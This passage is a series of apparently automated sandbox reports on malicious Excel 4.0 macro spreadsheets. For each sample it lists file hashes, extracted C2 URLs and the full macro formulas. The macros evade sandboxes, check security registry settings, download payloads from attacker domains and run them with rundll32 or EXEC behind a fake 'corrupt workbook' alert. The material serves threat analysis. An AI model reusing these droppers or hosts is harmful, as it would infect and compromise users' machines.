255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k6jG4SfvNI\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6177ebf6504fc84bee339b129b2e7aba3aab92df5f5b2d3891c17705827ab172"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"6177ebf6504fc84bee339b129b2e7aba3aab92df5f5b2d3891c17705827ab172","filesize":185344,"md5":"ee6b88ed153f03edb71af5a4952c6abb","sha1":"f60a7095f76b2f68564dbf9987d91abf3ce09fd6","sha256":"6177ebf6504fc84bee339b129b2e7aba3aab92df5f5b2d3891c17705827ab172","sha512":"fe16a6b9a110ea6d8a4318e1eee59bef8a8605c93cc20a5ac7b2a2b50ab4cbb385d352bc428797435f7110b27a0aff4e20a4331bb52e2a34b010619e8c3afad7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6177ebf6504fc84bee339b129b2e7aba3aab92df5f5b2d3891c17705827ab172.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"617fe3a4bb6e94d62a4ccb0922542d52d636084b5d2c91f0427d3496fddbd36f"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"617fe3a4bb6e94d62a4ccb0922542d52d636084b5d2c91f0427d3496fddbd36f","filesize":225280,"md5":"2b9aa91a2be13918234c97ac0624c35f","sha1":"c6c3b0fbdf5b5bdd9c6938dc09c4929a622d70be","sha256":"617fe3a4bb6e94d62a4ccb0922542d52d636084b5d2c91f0427d3496fddbd36f","sha512":"04af065ab8df4a2989e05040282ad7d23f9a6c038aa075ab0b326b0685b3c597f673ed1bc7fcc9419d92c843363841ac7fa41a6c90248a6d542a3bde2ab5f23f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"617fe3a4bb6e94d62a4ccb0922542d52d636084b5d2c91f0427d3496fddbd36f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Fma35p8aX6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"618c2fed90e15f8e2f322a35ea4dce3536b33aec6d2acd04ae5472960f2f29fa"},"analysis":{"reported":"2020-04-09T16:16:36Z","score":10},"files":[{"filename":"618c2fed90e15f8e2f322a35ea4dce3536b33aec6d2acd04ae5472960f2f29fa","filesize":214016,"md5":"8eba75dabaf6ecad5ee1fb7c3267eedf","sha1":"bddcf36168a94d0e09eb06e603008cff0da7c61d","sha256":"618c2fed90e15f8e2f322a35ea4dce3536b33aec6d2acd04ae5472960f2f29fa","sha512":"c53387228cd262c56151a252eac794d7e388bb555354853d4cb978b5421f496314859d30a4eec9f401b6185d77d00b1dd2921f7e8e2663635d8350bc0cd6ac5f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"618c2fed90e15f8e2f322a35ea4dce3536b33aec6d2acd04ae5472960f2f29fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OPussKix64\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"618feb555dca1336f0191d99f2c10b65154d93a906c4643ba11f742f719bc3fe"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"618feb555dca1336f0191d99f2c10b65154d93a906c4643ba11f742f719bc3fe","filesize":152576,"md5":"6a055c8b2464acbe63a03c9512fd839c","sha1":"406fe15ac623527ce53da7791c7bb687829e2489","sha256":"618feb555dca1336f0191d99f2c10b65154d93a906c4643ba11f742f719bc3fe","sha512":"6b1c2a20ca0c7c64d3e6dd161870fcc5c53c4444b02bb7b6e9749b3ab0a5532fdeb6c4419706d0bed54d25e23df2a4c3734d5a8cd1b11adc7d34021161be7df2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"618feb555dca1336f0191d99f2c10b65154d93a906c4643ba11f742f719bc3fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YHXL7S4uLG\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"619d438fe130d4d874af1ed5fbc5cf4217d175e57d184336d28e2f038abf29f3"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"619d438fe130d4d874af1ed5fbc5cf4217d175e57d184336d28e2f038abf29f3","filesize":113664,"md5":"f94c96d48134d0e2b81bedf6390aef2c","sha1":"d9672d57df5c36a2fd7f92da47c12c2809eaa0d9","sha256":"619d438fe130d4d874af1ed5fbc5cf4217d175e57d184336d28e2f038abf29f3","sha512":"e1e7597bdf441dcee1de022c44bd05041e5553a593db37a9c7420067885b119d00fcb4c25370bfba24e90e6eb6d05184efff7c55c45aff2b13cf2efd50a86fcf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"619d438fe130d4d874af1ed5fbc5cf4217d175e57d184336d28e2f038abf29f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"l9oXK4bXCV\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61b868e9acdd6124700bf525068022103fd94cb1ba849a6bea29132284eaf440"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61b868e9acdd6124700bf525068022103fd94cb1ba849a6bea29132284eaf440","filesize":112128,"md5":"8a9b71a979843ecda90f422ff5603978","sha1":"ef634c66fc9be32679e36e9318b27196c085e796","sha256":"61b868e9acdd6124700bf525068022103fd94cb1ba849a6bea29132284eaf440","sha512":"a3946eeda566bbd71f1c9a920c71739e3975b4de51c8dca5e5f145ad9acb880454ceaf3cecc4b78c43dc1b6150002e516fdf75b71eb2d1da275f4944b2888213","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61b868e9acdd6124700bf525068022103fd94cb1ba849a6bea29132284eaf440.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61c1f529057bacdb4f02439b978185c26511e47d86a4ae03c155031123cc838c"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61c1f529057bacdb4f02439b978185c26511e47d86a4ae03c155031123cc838c","filesize":112128,"md5":"52d1c6512c1b90c2774bc477a5986b9c","sha1":"53954f2b75e68b5825b0b0eb340a4c7b2c18b9a4","sha256":"61c1f529057bacdb4f02439b978185c26511e47d86a4ae03c155031123cc838c","sha512":"f6caf6f4fd3e7893e50903d5224d0fd59c1f2bf89872987aae1fb4d1f5680c544f867408319191d7aeb87d219fae25496112835b4e99277ae1be8a63c9bdde06","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61c1f529057bacdb4f02439b978185c26511e47d86a4ae03c155031123cc838c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61c245b5e3ef9d46302ffbc7d3e7462a00adaa08a72661f7d262b9458e16de75"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61c245b5e3ef9d46302ffbc7d3e7462a00adaa08a72661f7d262b9458e16de75","filesize":152576,"md5":"12f4e69f9689bf52ef6aae30f929dd01","sha1":"132c4f15199e73b66c92d054259e1da799809662","sha256":"61c245b5e3ef9d46302ffbc7d3e7462a00adaa08a72661f7d262b9458e16de75","sha512":"0af518dad0fb779b71c678244a84adbe67f3ada1488c291a895af297614bc83e7df6dbd4668411cefc4c791c2d2ad962194d2b6363a0b453f78b6aa409481964","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61c245b5e3ef9d46302ffbc7d3e7462a00adaa08a72661f7d262b9458e16de75.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"A5WPpWFcpB\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61c28b2d41dd3cc718c8787893ed4ce3fbebc54d56a5b684eae31b2c8e69eb4b"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61c28b2d41dd3cc718c8787893ed4ce3fbebc54d56a5b684eae31b2c8e69eb4b","filesize":206336,"md5":"4eeaf7afa2f73f4ebc9ce3e86a188703","sha1":"750a262885fedcb15a475219e654cd1ce7e067e0","sha256":"61c28b2d41dd3cc718c8787893ed4ce3fbebc54d56a5b684eae31b2c8e69eb4b","sha512":"95cd3ef5ee98019eb0fd2601b60b2f5c5408076f4be34a6beaf02a770a18be1979f664492e013c32f8775c99204a2a57f6eb5c80af8ce9e42e8dd24bcc0ec431","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61c28b2d41dd3cc718c8787893ed4ce3fbebc54d56a5b684eae31b2c8e69eb4b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FJU0niAVlu\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61c2dcc6982d424e3308eb7a0396c37d243608da20cdd4b0cc55da66b8a046d3"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61c2dcc6982d424e3308eb7a0396c37d243608da20cdd4b0cc55da66b8a046d3","filesize":168448,"md5":"0688d0edb06a8648c632968b424bd056","sha1":"d91c6101cb50256ed96a271f2e73576e2e184588","sha256":"61c2dcc6982d424e3308eb7a0396c37d243608da20cdd4b0cc55da66b8a046d3","sha512":"b22d7048f82fd8ab83ee2d66176a99a5aea8df5db3695ef010fabcc5d9475079afd44d27e66357d4a6a3a63fafe34b61fe866f0800aa9ff4ac82afadd449b5f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61c2dcc6982d424e3308eb7a0396c37d243608da20cdd4b0cc55da66b8a046d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PwUknepcsZ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61d431ccad9846e56029b312ab8cd937f4c9b202c8770edf4c96a4281dd82943"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61d431ccad9846e56029b312ab8cd937f4c9b202c8770edf4c96a4281dd82943","filesize":145920,"md5":"32e64a57314e5f0c7c5c23b31183f296","sha1":"abad15c12abaebc617a88b4aaaddaf51b3172644","sha256":"61d431ccad9846e56029b312ab8cd937f4c9b202c8770edf4c96a4281dd82943","sha512":"341950aadb5c6a0ef1c7bd194dab568a8c42f52c700e6c42a6fc1b9ca4e6d2f6f95e33494452e72db26cfc100b6e8d7aed0c8bc16ef1864ee13f355ea5f7afd7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61d431ccad9846e56029b312ab8cd937f4c9b202c8770edf4c96a4281dd82943.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"KxKjwFb1Oh\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61db7b56dfd8d17b9db8bae6a1c39edd4edb7a27058c0f7ba80aae136316e265"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61db7b56dfd8d17b9db8bae6a1c39edd4edb7a27058c0f7ba80aae136316e265","filesize":185344,"md5":"92192040fca96c9a096de9f6f36b0f24","sha1":"03ebc4ca4a56012fb78d32b42dd2abe5341d4545","sha256":"61db7b56dfd8d17b9db8bae6a1c39edd4edb7a27058c0f7ba80aae136316e265","sha512":"6b449ca822b508f52ff7eb695f8f27f6839cab0f4199128ce113b358d6dd5a1c531a8422bd380cfb0943e14104a4c847d46f4e7a19e4cce29302baf69a8f295f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61db7b56dfd8d17b9db8bae6a1c39edd4edb7a27058c0f7ba80aae136316e265.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"61fd9842b4d76a5bcf0750a74d7ae1651278c3070912faa8eb1c3040059036b2"},"analysis":{"reported":"2020-04-09T16:16:37Z","score":10},"files":[{"filename":"61fd9842b4d76a5bcf0750a74d7ae1651278c3070912faa8eb1c3040059036b2","filesize":141312,"md5":"f129b76bfeafcde65464fd7f673985c3","sha1":"c4d3f919d6d70459e6a342c9b6d0b073138e1235","sha256":"61fd9842b4d76a5bcf0750a74d7ae1651278c3070912faa8eb1c3040059036b2","sha512":"fa6e420a2261dcb28261589e5e5af7d32408e5a15ebd1f0397263142e604149d7aabf962d0f83de4b51314321d487788b23ea7d8aec861753b6b2d3bb6c26b1e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"61fd9842b4d76a5bcf0750a74d7ae1651278c3070912faa8eb1c3040059036b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"xGsUtK2Nb1\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6207cce535fe8b701480f5dd72da4396764845ec992e7abbcc13b29dad3564b1"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"6207cce535fe8b701480f5dd72da4396764845ec992e7abbcc13b29dad3564b1","filesize":209408,"md5":"2523335a0577c15da47fc532f10aaee3","sha1":"fe2a220092a46d3595c53fa780fcd0f56f3c1369","sha256":"6207cce535fe8b701480f5dd72da4396764845ec992e7abbcc13b29dad3564b1","sha512":"a8ec946eb8914b2eae81bbee9f340db6481812546b2b9a12aa4d71ffd8048e30a011aa7f354091256b0fae1a529cec402c134d327fec6432a48f5814cab60dcf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6207cce535fe8b701480f5dd72da4396764845ec992e7abbcc13b29dad3564b1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zd1b3zKXNG\",TRUE)\nGOTO(R$1C$10)"}}}]}
